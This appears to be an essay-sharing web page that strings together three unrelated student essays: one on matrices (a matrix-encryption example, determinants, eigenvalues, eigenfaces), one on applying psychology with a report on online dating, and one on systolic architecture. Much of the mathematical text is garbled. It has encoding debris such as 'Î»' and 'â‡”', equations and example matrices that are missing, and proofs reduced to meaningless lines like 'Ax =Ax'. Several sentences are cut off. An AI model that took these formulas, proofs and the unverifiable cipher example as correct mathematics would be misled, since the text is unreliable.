## History and Applications of Matrices

Matrices find many applications at current time and very useful to us. Physics makes use of matrices in various domains, for example in geometrical optics and matrix mechanics; the latter led to studying in more detail matrices with an infinite number of rows and columns. Graph theory uses matrices to keep track of distances between pairs of vertices in a graph. Computer graphics uses matrices to project 3-dimensional space onto a 2-dimensional screen.
Example of application
A message is converted into numeric form according to some scheme. The easiest scheme is to let space=0, A=1, B=2, …, Y=25, and Z=26. For example, the message “Red Rum” would become 18, 5, 4, 0, 18, 21, 13.
This data was placed into matrix form. The size of the matrix depends on the size of the encryption key. Let’s say that our encryption matrix (encoding matrix) is a 2×2 matrix. Since I have seven pieces of data, I would place that into a 4×2 matrix and fill the last spot with a space to make the matrix complete. Let’s call the original, unencrypted data matrix A.

There is an invertible matrix which is called the encryption matrix or the encoding matrix. We’ll call it matrix B. Since this matrix needs to be invertible, it must be square.
This could really be anything, it’s up to the person encrypting the matrix. I’ll use this matrix.

The unencrypted data is then multiplied by our encoding matrix. The result of this multiplication is the matrix containing the encrypted data. We’ll call it matrix X.

The message that you would pass on to the other person is the the stream of numbers 67, -21, 16, -8, 51, 27, 52, -26.
Decryption Process
Place the encrypted stream of numbers that represents an encrypted message into a matrix.
Multiply by the decoding matrix. The decoding matrix is the inverse of the encoding matrix.
Convert the matrix into a stream of numbers.
Conver the numbers into the text of the original message.
DETERMINANTS
The determinant of a matrix A is denoted det(A), or without parentheses: det A. An alternative notation, used for compactness, especially in the case where the matrix entries are written out in full, is to denote the determinant of a matrix by surrounding the matrix entries by vertical bars instead of the usual brackets or parentheses.
For a fixed nonnegative integer n, there is a unique determinant function for the nÃ-n matrices over any commutative ring R. In particular, this unique function exists when R is the field of real or complex numbers.
For any square matrix of order 2, we have found a necessary and sufficient condition for invertibility. Indeed, consider the matrix
Example. Evaluate
Let us transform this matrix into a triangular one through elementary operations. We will keep the first row and add to the second one the first multiplied by . We get
Using the Property 2, we get
Therefore, we have
which one may check easily.
EIGEN VALUES AND EIGEN VECTORS
In mathematics, eigenvalue, eigenvector, and eigenspace are related concepts in the field of linear algebra. The prefix eigen- is adopted from the German word “eigen” for “innate”, “idiosyncratic”, “own”. Linear algebra studies linear transformations, which are represented by matrices acting on vectors. Eigenvalues, eigenvectors and eigenspaces are properties of a matrix. They are computed by a method described below, give important information about the matrix, and can be used in matrix factorization. They have applications in areas of applied mathematics as diverse as economics and quantum mechanics.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

In general, a matrix acts on a vector by changing both its magnitude and its direction. However, a matrix may act on certain vectors by changing only their magnitude, and leaving their direction unchanged (or possibly reversing it). These vectors are the eigenvectors of the matrix. A matrix acts on an eigenvector by multiplying its magnitude by a factor, which is positive if its direction is unchanged and negative if its direction is reversed. This factor is the eigenvalue associated with that eigenvector. An eigenspace is the set of all eigenvectors that have the same eigenvalue, together with the zero vector.
These concepts are formally defined in the language of matrices and linear transformations. Formally, if A is a linear transformation, a non-null vector x is an eigenvector of A if there is a scalar Î» such that
The scalar Î» is said to be an eigenvalue of A corresponding to the eigenvector x.
Eigenvalues and Eigenvectors: An Introduction
The eigenvalue problem is a problem of considerable theoretical interest and wide-ranging application. For example, this problem is crucial in solving systems of differential equations, analyzing population growth models, and calculating powers of matrices (in order to define the exponential matrix). Other areas such as physics, sociology, biology, economics and statistics have focused considerable attention on “eigenvalues” and “eigenvectors”-their applications and their computations. Before we give the formal definition, let us introduce these concepts on an example.
Example.
Consider the matrix
Consider the three column matrices
We have
In other words, we have
Next consider the matrix P for which the columns are C1, C2, and C3, i.e.,
We have det(P) = 84. So this matrix is invertible. Easy calculations give
Next we evaluate the matrix P-1AP. We leave the details to the reader to check that we have
In other words, we have
Using the matrix multiplication, we obtain
which implies that A is similar to a diagonal matrix. In particular, we have
for . Note that it is almost impossible to find A75 directly from the original form of A.
This example is so rich of conclusions that many questions impose themselves in a natural way. For example, given a square matrix A, how do we find column matrices which have similar behaviors as the above ones? In other words, how do we find these column matrices which will help find the invertible matrix P such that P-1AP is a diagonal matrix?
From now on, we will call column matrices vectors. So the above column matrices C1, C2, and C3 are now vectors. We have the following definition.
Definition. Let A be a square matrix. A non-zero vector C is called an eigenvector of A if and only if there exists a number (real or complex) such that
If such a number exists, it is called an eigenvalue of A. The vector C is called eigenvector associated to the eigenvalue .
Remark. The eigenvector C must be non-zero since we have
for any number .
Example. Consider the matrix
We have seen that
where
So C1 is an eigenvector of A associated to the eigenvalue 0. C2 is an eigenvector of A associated to the eigenvalue -4 while C3 is an eigenvector of A associated to the eigenvalue 3.
It may be interesting to know whether we found all the eigenvalues of A in the above example. In the next page, we will discuss this question as well as how to find the eigenvalues of a square matrix.
PROOFS OF PROPERTIES OF EIGEN VALUES:::
PROPERTY 1
{Inverse of a matrix A exists if and only if zero is not an eigenvalue of A}
Suppose A is a square matrix. Then A is singular if and only if Î»=0 is an eigenvalue of A.
Proof We have the following equivalences:
A is singular
â‡”there exists xâ‰ 0, Ax=0
â‡”there exists xâ‰ 0, Ax=0x
â‡”Î»=0 is an eigenvalue of A
Since SINGULAR matrix A has eigenvalue and the inverse of a singular matrix does not exist this implies that for a matrix to be invertible its eigenvalues must be non-zero.
PROPERTY-2
Eigenvalues of a matrix are real or complex conjugates in pairs
Suppose A is a square matrix with real entries and x is an eigenvector of A for the
eigenvalue Î». Then x is an eigenvector of A for the eigenvalue Î». â-¡
Proof
Ax =Ax
=Ax
=Î»x
=Î»x
A has real entries x eigenvector of A
Suppose A is an mÃ-n matrix and B is an nÃ-p matrix. Then AB=AB. â-¡
Proof To obtain this matrix equality, we will work entry-by-entry. For 1â‰¤iâ‰¤m, 1â‰¤jâ‰¤p,
ABij =ABij =âˆ‘nk=1AikBkj =âˆ‘nk=1AikBkj =âˆ‘nk=1AikBkj =âˆ‘nk=1AikBkj =ABij
APPLICATION OF EIGEN VALUES IN FACIAL RECOGNITION
How does it work?
The task of facial recogniton is discriminating input signals (image data) into several classes (persons). The input signals are highly noisy (e.g. the noise is caused by differing lighting conditions, pose etc.), yet the input images are not completely random and in spite of their differences there are patterns which occur in any input signal. Such patterns, which can be observed in all signals could be – in the domain of facial recognition – the presence of some objects (eyes, nose, mouth) in any face as well as relative distances between these objects. These characteristic features are called eigenfaces in the facial recognition domain (or principal components generally). They can be extracted out of original image data by means of a mathematical tool called Principal Component Analysis (PCA).
By means of PCA one can transform each original image of the training set into a corresponding eigenface. An important feature of PCA is that one can reconstruct reconstruct any original image from the training set by combining the eigenfaces. Remember that eigenfaces are nothing less than characteristic features of the faces. Therefore one could say that the original face image can be reconstructed from eigenfaces if one adds up all the eigenfaces (features) in the right proportion. Each eigenface represents only certain features of the face, which may or may not be present in the original image. If the feature is present in the original image to a higher degree, the share of the corresponding eigenface in the “sum” of the eigenfaces should be greater. If, contrary, the particular feature is not (or almost not) present in the original image, then the corresponding eigenface should contribute a smaller (or not at all) part to the sum of eigenfaces. So, in order to reconstruct the original image from the eigenfaces, one has to build a kind of weighted sum of all eigenfaces. That is, the reconstructed original image is equal to a sum of all eigenfaces, with each eigenface having a certain weight. This weight specifies, to what degree the specific feature (eigenface) is present in the original image.
If one uses all the eigenfaces extracted from original images, one can reconstruct the original images from the eigenfaces exactly. But one can also use only a part of the eigenfaces. Then the reconstructed image is an approximation of the original image. However, one can ensure that losses due to omitting some of the eigenfaces can be minimized. This happens by choosing only the most important features (eigenfaces). Omission of eigenfaces is necessary due to scarcity of computational resources.
How does this relate to facial recognition? The clue is that it is possible not only to extract the face from eigenfaces given a set of weights, but also to go the opposite way. This opposite way would be to extract the weights from eigenfaces and the face to be recognized. These weights tell nothing less, as the amount by which the face in question differs from “typical” faces represented by the eigenfaces. Therefore, using this weights one can determine two important things:
Determine, if the image in question is a face at all. In the case the weights of the image differ too much from the weights of face images (i.e. images, from which we know for sure that they are faces), the image probably is not a face.
Similar faces (images) possess similar features (eigenfaces) to similar degrees (weights). If one extracts weights from all the images available, the images could be grouped to clusters. That is, all images having similar weights are likely to be similar faces.

## Real-World Applications of Psychological Theories

‘Psychological theory and research into how people understand themselves and others has important real-world applications. ‘Evaluate this claim, drawing upon examples of research from across the module to support your answer.

This essay will evaluate the research across this module, which has shown examples of psychological theories and research into how people understand themselves and others, also how this has importance within real world applications. Within this evaluation examples drawn upon are from multiple blocks within this module which shows support for this claim. Although, also considering the option of in psychology are mistakes made, is there a possibility it could be wrong? Psychology is great; however, it does hold its own restrictions.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

How do we understand ourselves and others in the real world? One example of this in block 1 is mind reading, known as the theory of mind. Many people can automatically think of the term mind reading and associate this with psychics and mystics, known as the extraordinary mindreading(Hewson, 2015). However in a sense people mind read all the time as they network with others on a regular basis – this is mind reading used in real world application, people are accrediting mental states to others to interpret their actions in terms of such states including, beliefs, desires, goals/ambitions, emotions etc. Psychologist have therefore used this term ‘mindreading’ to refer to a basic capability, underpinning people’s social relations with others (Hewson, 2018)

Psychologist are very much interested in using their knowledge in the real world, although as well as this, investigating conditions such as autism and psychopathy provides useful theoretical comprehensions to the human mind, for example in the case of autism this work has been focused on helping develop the ability of those with ASD to intermingle with others in order to improve their quality of life (Hewson and Turner, 2018a). Reviewing methods to try and teach autistic children mindreading skills, a project had taken place, a computer game initially intended to teach both emotion recognition and emotion expression, however there had been inadequate research data on emotion expression, therefore the sample could not be developed in this way, this demonstrates the essential role behind research findings and theories in informing such real world mediations. Such research is central to developing real world interventions that can be effective and useful in helping individuals with conditions such as autism(Hewson and Turner, 2018b). The basic ability is found to be a essential element of human social interaction, for the majority of people, these ‘mindreading’ skills are often in use spontaneously and naturally, without needing a great deal of conscious thought or reflection, except maybe when dealing with challenging situations, such as conflict with others (Hewson and Turner, 2018c).

Furthermore when dealing with these challenging situations, such as conflict with others, theories of relationship conflict can be reflected at three different stages; internal individual experience, interpersonal dynamics and sociocultural messages, it may be that none of these theories are the right way or the best insight, although psychologist have studied conflict in different ways, all these ways show to have something to offer our understanding of the complicated area. Looking into the social rules people have absorbed, the history of peoples relationships with each other, their self-concept and then the things they value, the anger that can be experienced, the ways their thoughts process and memories work, by examining the conflict on all these different levels it helps to build a more in-depth understanding of what is taking place(Barker, 2018a). However, it is important to remember that it is said tensions exist between different theories, the existential approach, which sees conflict as being an unavoidable part of human relationships, the sociocultural approach, which maintains that the way in which relationships are made makes them as if they are almost drawn to conflict, then there is the explanation that conflict is the consequence from the internal cognitive biases, which all people have, and it also being the sociocultural approach, which places the foundation of conflict within the social messages, suggesting; that people would not experience conflict in the ways they do at current if social standards did not daunt people from admitting when they are in the wrong (Barker, 2018b).  Also, remembering different cultures, social class and different communities have been noticed to having dissimilar ways of connecting and interacting which may seem like conflict to other people on the outside of this, which then this leads on to the expectancies of specific sorts of relationships, meaning that more people are more prone to self-justification or objectification, meaning the need then lead us to consider how peoples identities are bound up in the wider social context of their nationalities (Barker, 2015).

Having reflected on the impact of social relationships in everyday life, and then focusing on nations, an important source of identification for people, the social structure of nations, nations then being described as constructed categories of belonging a mention of nations not being ‘natural;’ communities, that they are socially and historically constructed. They are ‘imagined’ communities as Benedict Anderson (1983) has famously argued. Within psychology there is a wide framework of an approach towards the social constructionists, this is including three focus areas within this approach to understanding the nations; Variability- people or groups with different positions and interests which then may acquire and advance and different understanding of their nation, another being change and debate- the meaning national identities can be the subject of debate where as individuals or different groups argue for their individuality and try to establish their own understanding of national identity, this also means that the meanings attached to national identities are open to be argues and can therefore change, last but not least, functions of different ways of constructing the nation- social constructionist research, showing an interest in researching who is included and excluded in different versions of outlining nation, as an example (Andreouli, 2018a). Therefore, it is suggested that nations and national identities are socially constructed and are then likely to change and up for dispute.

Although, as for identities being socially constructed and therefore, more likely to change and be up for dispute, this brings up a subject such as sexuality and the question around sex.

Having already focused on the relationship between peoples experience of the world and the way they show their understanding of it, psychological research and theory has shown on sex and sexuality that there is evidence of relevance across a number of applied fields, for example, it is useful for sexual educationalists to know how sexual awareness and the understanding of this subject develops during vital times including childhood and puberty age groups , It is also recognised that criminal and forensic psychologist need to know about criminal sexual behaviours, as dealing with the real world application within forensics, when and if sexual violence should occur there should be ideas of this happening and how to prevent or treat those who commit sexual offences. However, also using psychological study in these terms  for the opposite line of work almost, applying this with victims and perpetrators and also the general persons (Barker, 2018c).

The richness as well as diversity involved in this subject is  can also been seen as a part of, the online world, which shows evolvement, to show and meet demands of its users and offering variety and/or opportunities (Fox-Hamilton and Fullwood, 2018a), Some of the internet’s features adopt negative behaviours, this can include online aggression, trolling and flaming and cyber bullying however, in comparison the internet also has some positives which have been known to improve and add value to peoples lives. Upon reflection it is not merely possible to make out if the internet is ‘good’ or ‘bad’ as trying to determine this is not useful because it open up many possibilities for many people at the same time as introducing difficulties for others. In relation to the positives of the internet, and its knowingness of being able to increase psychological well-being, the internet has shown it can promote and support minority or disadvantaged groups, meaning there can be a sense of belonging for example those with disabilities and those within the LGBT community(Fox-Hamilton and Fullwood, 2018b).

As well as there being support found online there is also the suggestion of self-help. Focusing on the relationship between psychology and self-help it must be considered that for as long as psychology has existed as a form of discipline, there has also been a promotion for self-help books and also other materials directing people on how they can make changes to their lives for the better through numerous approaches, these strategies seem to belong to the world of psychology but are not actually based on any sort of psychological research or ideas. In the last couple of decades psychologists have started to investigate  the self-help literature in ways to find out what can be told to us regarding admired cultural views of psychological matters this is including examples such as, mental health problems, relationships and decision-making to which then this leads onto how peoples understanding shape their experiences and also how peoples self-experience can influence their understandings. The main aim is to try and improve people’s experiences by giving them, themselves a better understanding of how the self works psychologically. Considering the attempts to change people’s cognitive preferences so that they become more ‘mindful’ and are able to understand the role of sociocultural messages during their time of difficulties, such approaches are more rooted in research on people’s actual experiences, so therefore this could be regarded as one way of drawing on experience to improve understanding to self in the real world. (Barker 2018d)

All these psychological ideas and concepts should show a good understanding of how psychologist have explored the relationship between people and the natural environments and how the knowledge gained has been applied in real world application, psychology can get theories wrong when it comes to real world application however, research is often generated in response to cultural aspects as they arise, psychologist are always looking back at research to help development, psychology is everywhere in human life , there are characteristics to human life that would have been expected to belong to a different discipline however they are a part of/shared with psychology. Aspects of living psychology make psychology a fundamental part of how you live life, in particular how you think about yourself, the world and others. Every human has a brain that has been shaped by the evolutionary burdens however, much of what has been identified applies differently to people or applies to the same person differently at multiple stages in their life. A key aspect of psychology as a discipline is to remember, the gathering of individual experiences, the attempt to make sense of them, living psychology is something that everyone is doing every day and extraordinary. (Turner 2015) This concludes psychology does have an amazing input, although it does have its  limits, it is work in progress.

References

Part 1:

Andreouli, E. (2018a) ’3 The social construction of nations’, DD210 Week 10: Nations and immigration [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303171&section=3 (assessed 22 May 2019)

Barker, M.J (2018a) ’2.1theories of relationship conflict’, DD210 Week 8: Conflict in close relationships [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303169&section=2.1 (assessed 22 May 2019)

Barker, M.J (2018b) ’6 Considering the theories together’, DD210 Week 8: Conflict in close relationships [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303169&section=6 (assessed 22 May 2019)

Barker, M.J (2018c) ’4 Applying the psychology of sex and sexuality’, DD210 Week 24: Sex and sexuality [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303191&section=4 (assessed 22 May 2019)

Barker, M.J (2018c) ’1 Introduction’, DD210 Week 26: Self-help – changing people’s understanding to change their experience [online] available at https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303193 (assessed 22 May 2019)

Barker, M.J (2015) ‘Conflict in close relationships’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary Book1,Milton Keynes, The Open University, pp. 233

Fox-Hamilton, N and Fullwood, C (2018a) ‘3 Everyday Perspectives 1: Engaging online’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=3 (assessed 22 May 2019)

Fox-Hamilton, N and Fullwood, C (2018J) ‘7 The positive net: Online support’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=7 (assessed 22 May 2019)

Hewson, C. (2015) ‘Mindreading’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary Book1,Milton Keynes, The Open University, pp. 21-22

Hewson, C (2018) ‘3 Everyday mindreading’, DD210 Week 2: Mindreading [online] available at https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303161&section=3 (assessed 22 May 2019)

Hewson, C and Turner, J (2018a) ‘9 Applications in the real world’, DD210 Week 4: Mindreading difficulties- examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=9 (assessed 22 May 2019)

Hewson, C and Turner, J (2018b) ’10.3 Autism intervention research: the Camp Exploration project’, DD210 Week 4: Mindreading difficulties- examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=10.3 (assessed 22 May 2019)

Hewson, C and Turner, J (2018c)’2 Mindreading difficulties’, DD210 Week 4: Mindreading difficulties- examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=2 (assessed 22 May 2019)

Turner, J. (2015) ‘Conclusion’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary Book 2,Milton Keynes, The Open University, pp. 267-272

Part 2: Report

Write a brief report relevant to the areas identified in the scenario provided.

Psychological theory of online communication and creativity

for online dating over 30’s

Introduction :

Within this report it will be discussed whether the creativity of this idea will work, looking at the online medium, as well as the psychological aspects relevant to the online dating scene, looking at innovative ways in which people can interact on dating websites, and the factors for creativity in order to understand the idea and understand the future customer. Considering the experience of the CEO and directors and their use of dating websites’ the certainty of ensuring that a new website is developed in such a way to be based on the online medium and for the idea to hold deeper understanding of the psychological aspects that are relevant to the dating context should be possible, with the source of these aims provided via methods and findings.

Understanding online communication :

It has been understood that internet access improves the living conditions of nations , this has resulted in several leads  to help mend the ‘digital divide’, or the disproportion of access to the internet by the known disadvantaged groups such as the elderly(Fox-Hamilton and Fullwood, 2018a). The online world keeps growing, this is a particular with meaning to meet the demands of its users and as well as this it offers a massive variety of opportunities. There have been and always will be specifics that people are able to engage within with activities online, however this is dependent on people’s personalities and social perspectives(Fox-Hamilton and Fullwood, 2018b).

Approaches to creativity :

Psychologist who have studied creativity have taken an emphasis at looking at the mental processes involved in a task for example, creative problem solving, however social psychologist have challenged this focus on an individual perspective, and have suggested creativity is ‘made’ and is not automatically ‘born’ and that interpersonal relationships are critical to it. There are two definitions for creativity one of which is an operational definition, by which creativity can be observed and measured for research purposes, then there is a theoretical definition which is to explain the operational one. Each has different implications for how creativity can be evaluated (Taylor and Turner 2018a).

Furthermore, using examples given by Amabile (1983) citied  in (Taylor and Turner 2018b) if you want to know whether a piece of work is creative, just ask someone, better yet, ask a number of people who are skilled enough in the field to make that assessment and see whether they think the output is creative. Creativity is not just about what needs to be done but also to know how to do it, problem solving entails creativity, so does discovering what the problem is, that needs to be solved, having to consider the task at hand being either algorithmic, which is a task that can be solved following clear paths or set of rules or heuristic, described as the resolution has to be invented in order to deal with the problem, as there is no answer already (Taylor and Turner 2018c).

Perceptions:

A psychological aspect relevant to an online dating context and understanding the future customer.

As explained some people are concerned with how other people perceive them. Mckenna and Colleagues (2002) cited in (Fox-Hamilton and Fullwood, 2018c) have made note of at least four ways in which the internet has a different approach to face to face communication;

People do not have to reveal their identity to others online

Within dating sites there is a tendency to want to see the other person, with such a specific audience for the age group chosen, there is a possibility to lean more towards psychologically testing personalities, match personalities before looks.

There is a reduction in the importance of the individual’s physical appearance online compared to offline

There is no concern to look your absolute best when ‘dating’ online, this can be done within the comfort of your own home, at work or even sitting on public transport after the gym.

There is almost a level of control that exist over the time you put in and pace you can move at compared to face to face communication people can take their time to carefully consider what they are saying and edit messages before sending.

In this case it could be something as simple as setting up a bio, for people to really get to know each other, break barriers, there does not have to be any forced conversation, awkward pauses.

Easier online than offline for people to find connections with other similar people -someone to understand and/or fully appreciate a rare disorder.

Online this can be disclosed early on, or if preferred waiting to connect with someone in order to feel more open.

Self-presentations and Online Support :

When it comes to online self-presentation there are many things to consider, however the internet is not a uniform being, this may lead people to feel they have more control over there self-presentation. Those who will be using this dating site need to be reminded that there Is an understanding of that self-presentation not only has implications for how others perceive a person but how the person is viewing themselves. This site needs to feed into people’s self-worth (Fox-Hamilton and Fullwood, 2018d). There are experiences of negativity online, which is where support comes in, showing the positive aspects which show to improve and add value to people lives, the internet along with this site can show to encourage and empower the minority groups to provide a feeling of belonging (Fox-Hamilton and Fullwood, 2018e).

Conclusions:

Online dating is growing, many people are evolving and creating important personal relationships it’s important to understand how people act in and perceive these relationships. With the understanding of online communication and how it has improved the living conditions of nations, its growth and available opportunities as well creativity. Examples such as if you want to know whether a piece of work is creative, ask someone, or a number of people who are skilled enough, see what they think. Remember, to be creative is not just about what needs to be done but also to know how it needs to be done. Keeping in mind perceptions of self and others, leading onto self-presentations and support that can and is provided.

Recommendations :

Skills needed for creativity in the work place,

Domain-relevant skills- The knowledge and technical abilities which belong to a specific field or area.

Creativity relevant skills- More general, finding a way to complete a task, people can be taught problem-solving skills, and also how to approach task in a creative way. ‘Make the familiar strange’ Gordan (1961) citied in (Taylor and Turner 2018d)

Having motivation is also essential

Motivation from a personal view consisting of a person’s interests and experiences.

Extrinsic- An external goal, wanting to achieve what has been set out. (Taylor and Turner 2018e)

Working together, a pair or a group can merge into a unit that becomes a source of new creative outputs, working together can help share the workload, provide help and support to one another , two heads are better than one, different skills can combine and encourage new ways of thinking(Taylor and Turner 2018f)

Word limit: 1200 words

References

Part 2:

Fox-Hamilton, N and Fullwood, C (2018a) ‘2 The Internet and Its Importance’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=2 (assessed 21 May 2019)

Fox-Hamilton, N and Fullwood, C (2018b) ‘3 Everyday Perspectives 1: Engaging online’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=3 (assessed 21 May 2019)

Fox-Hamilton, N and Fullwood, C (2018c) ‘5.1 How is the internet different from face-to-face communication’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=5.1 (assessed 21 May 2019)

Fox-Hamilton, N and Fullwood, C (2018d) ‘5.2 The online environment and self-presentation’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=5.2 (assessed 21 May 2019)

Fox-Hamilton, N and Fullwood, C (2018e) ‘7 The positive net: Online support’, DD210 Week 25:Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=7 (assessed 21 May 2019)

Turner, J. and Taylor, S. (2018a) ‘3 How can creativity be evaluated?’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3 (assessed 26 May 2019)

Turner, J. and Taylor, S. (2018b) ‘3.1 An operational definition of creativity’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3.1 (assessed 26 May 2019)

Turner, J. and Taylor, S. (2018c) ‘3.2 A theoretical definition of creativity’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3.2 (assessed 26 May 2019)

Turner, J. and Taylor, S. (2018d) ‘4.1 The skills necessary for creativity’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=4.1 (assessed 26 May 2019)

Turner, J. and Taylor, S. (2018e) ‘4.2 The motivation for creativity’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=4.2 (assessed 26 May 2019)

Turner, J. and Taylor, S. (2018f) ‘5 Framework 2: creative collaborations’, DD210 Week 9:Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=5 (assessed 26 May 2019)

## Systolic Architecture: History and Applications

SYSTOLIC ARCHITECTURE
A network of PEs that rhythmically produce and pass data through the system is called systolic architecture. It is used as a co processor in combination with a host computer and the behavior is analogous to the flow of blood through heart; thus named SYSTOLIC.
· A systolic architecture has the following characteristics :

A massive and non-centralised parallelism
Local communications
Synchronous evaluation

· Example of systolic network
1. Linear network
2. Bi-dimensional network
3. Hexagonal network
HISTORY:-
The systolic architecture paradigm, data-stream-driven by data counters, is the counterpart of thevon Neumann paradigm, instruction-stream-driven by a program counter. Because a systolic architecture usually sends and receives multiple data streams, and multiple data counters are needed to generate these data streams, it supportsdata parallelism.The namederives from analogy with the regular pumping of blood by the heart.
H. T. KungandCharles E. Leierson published the first paper describing systolic arrays in 1978; however, the first machine known to have used a similar technique was theColossus Mark IIin 1944.
NEED FOR SYSTOLIC ARCHITECHTURE:-
We need a high-performance, special-purpose computer system to meet specific application. I/O and computation imbalance is a notable problem .The concept of Systolic architecture can map high-level computation into hardware structures .Systolic system is easy to implement because of its regularity and easy to recon .Systolic architecture can result in cost-effective , high- performance special-purpose systems for a wide range of problems.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

An efficient approach to design very large scale integration (VLSI) architectures and a scheme for the implementation of the discrete sine transform (DST), based on an appropriate decomposition method that uses circular correlations, is presented. The proposed design uses an efficient restructuring of the computation of the DST into two circular correlations, having similar structures and only one half of the length of the original transform; these can be concurrently computed and mapped on to the same systolic array. Significant improvement in the computational speed can be obtained at a reduced input-output (I/O) cost and low hardware complexity, retaining all the other benefits of the VLSI implementations of the discrete transforms, which use circular correlation or cyclic convolution structures. These features are demonstrated by comparing the proposed design with some of the previously reported schemes.
A more computationally efficient and scalable systolic architecture is provided for computing the discrete Fourier transform. The systolic architecture also provides a method for reducing the array area by limiting the number of complex multi pliers. In one embodiment, the design improvement is achieved by taking advantage of a more efficient computation scheme based on symmetries in the Fourier transform coefficient matrix and the radix-4 butterfly. The resulting design provides an array comprised of a plurality of smaller base-4 matrices that can simply be added or removed to provide scalability of the design for applications involving different transform lengths to be calculated. In this embodiment, the systolic array size provides greater flexibility because it can be applied for use with any transform length which is an integer multiple of sixteen. A systolic network is often use with a host station responsible for the communication with the outside world.As a result of the local-communication scheme, a systolic network is easily extended without to add any burden to the I/O.
CHARACHTERSTICS OF SYSTOLIC ARCHITECHTURE:-

A massive and non-centralised parallelism
Local communications
Synchronous evaluation
Data coming from the memory are used several time before to come back to it.
These architectures are well suited for a VLSI or FPGA network implementation.

· Other characteristics :

A systolic network is often use with a host station responsible for the communication with the outside world.
As a result of the local-communication scheme, a systolic network is easily extended without to add any burden to the I/O.

PRINCIPLE OF SYSTOLIC ARCHITECHTURE:-
Systolic system consists of a set interconnected cells, each capable of performing some simple operation. Systolic approach can speed up a compute-bound computation in a relatively simple and inexpensive manner. Through systolic array we achieve higher computation throughput without increasing memory bandwidth.
Which means that by using systolic architechture we can speed up our system. For eg. When we are using our simple aechitecture than we can perform atmost five million operatoins per second whereas by using systolic arrays in systolic architecture we can operate the system at a speed of 30 million operations per second.
WORKING:-
Systolic architecture consists of simple cells arranged in some regular pattern (linear, bi-directional, triangular, hexagonal, etc.) where each cell usually performs one operation. Each processing cell is connected to its neighbour or to a neighbour hood of processing elements by short signal paths. Both parallel and pipelined execution is implemented. A function that is to be performed can be represented by a set of Functional Primitives.
The systolic structure has advantages of regularity and modularity over implementations of the block-state-variable form, as it is regular and an nth order filter is simply formed by cascading second order filters. Therefore it is more suitable for the VLSI implementation. The idea is to exploit VLSI efficiently by laying out algorithms (and hence architectures) in 2-D (not all systolic machines are 2-D, but most are). The architectures thus produced are not general but tied to specific algorithms. This is good for computation-intensive tasks (e.g. signal processing).
TOOLS FOR SYSTOLIC ARCHITECTURE:-
SYSTOLIC ARRAY:-
Incomputer architecture, asystolic arrayis a pipe network arrangement of processing units called cells. It is a specialized form ofparallel computing, where cells (i.e. processors), compute data and store it independently of each other.
We need a high-performance, special-purpose computer system to meet specific application. I/O and computation imbalance is a notable problem.
The concept of Systolic architecture can map high-level computation into hardware structures. Systolic system works like an automobile assembly line. Systolic system is easy to implement because of its regularity and easy to recon. Systolic architecture can result in cost-effective, high-performance special-purpose systems for a wide range of problem.
Systolic Array Example:
3×3 Systolic Array Matrix Multiplication:-
T=7
DESCRIPTION OF SYSTOLIC ARRAYS:-
· Description :

It is a network of interconnected processing units.
Only the processors at the border of the architecture can communicate outside.

A systolic array is composed of matrix-like rows of data processing units called cells. Data processing unitsDPUsare similar tocentral processing units(CPU)s,(except for aprogram counter, since operation istransport-triggered, i.e., by the arrival of a data object). Each cell shares the information with its neighbors immediately after processing. The systolic array is often rectangular where data flows across the array between neighbour DPUs, often with different data flowing in different directions. The data streams entering and leaving the ports of the array are generated byauto-sequencing memoryunits, ASMs. Each ASM includes adata counter. Inembedded systemsa data stream may also be input from and/or output to an external source.
An example of a systolicalgorithmmight be designed formatrix multiplication. Onematrixis fed in a row at a time from the top of the array and is passed down the array, the other matrix is fed in a column at a time from the left hand side of the array and passes from left to right. Dummy values are then passed in until each processor has seen one whole row and one whole column. At this point, the result of the multiplication is stored in the array and can now be output a row or a column at a time, flowing down or across the array.
